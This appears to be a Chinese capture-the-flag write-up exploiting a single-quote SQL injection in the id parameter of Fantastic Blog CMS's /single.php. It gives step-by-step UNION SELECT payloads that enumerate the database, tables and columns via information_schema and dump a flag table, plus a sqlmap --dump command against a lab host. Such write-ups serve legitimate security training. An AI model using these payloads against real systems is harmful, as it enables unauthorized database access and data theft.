靶标介绍:
Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。
由于题目直接给出了路径和参数那便直接跳转,
然后找flag步骤为:
- 1、判断注入点
- 2、爆字段个数
- 3、爆显位位置
- 4、爆数据库名
- 5、爆数据库表名
- 6、爆数据库列名
- 7、爆数据库数据
1、判断注入点
直接1=1和1=2来判断,发现页面正常,然后输入1‘,则报错了
便可判断是单引号闭合。
2、爆字段个数
语句为 id=1' order by 10--+
直接尝试一个大一点的数,报错
然后试一下9,发现没有问题,则显为数为9
3、爆显位位置
语句为 id=-1' union select 1,2,3,4,5,6,7,8,9--+
发现2,3,7,8都是显位,
我直接用4
4 、爆数据库名
语句为
id=-1' union select 1,2,3,database(),5,6,7,8,9--+
爆出数据库名为ctf
5、爆数据库表名
语句为
id=-1' union select 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables where table_schema=database()--+
得到一大串表名,发现其中有flag表,所以关键表是flag表
6、爆数据库列名
语句为
id=-1' union select 1,2,3,group_concat(column_name),5,6,7,8,9 from information_schema.columns where table_schema=database() and table_name="flag"--+
得到列名flag
7、爆数据库数据
语句为
id=-1' union select 1,2,3,group_concat(flag),5,6,7,8,9 from flag --+
成功得到flag
总结:
其实这个题就是简单的单引号闭合题,也可以用sqlmap直接扫,更加简单快捷
python3 sqlmap.py -u "http://eci-2ze4tniv12j0xx7jday4.cloudeci1.ichunqiu.com/single.php?id=5" --batch -D ctf -T flag --dump
会直接爆出flag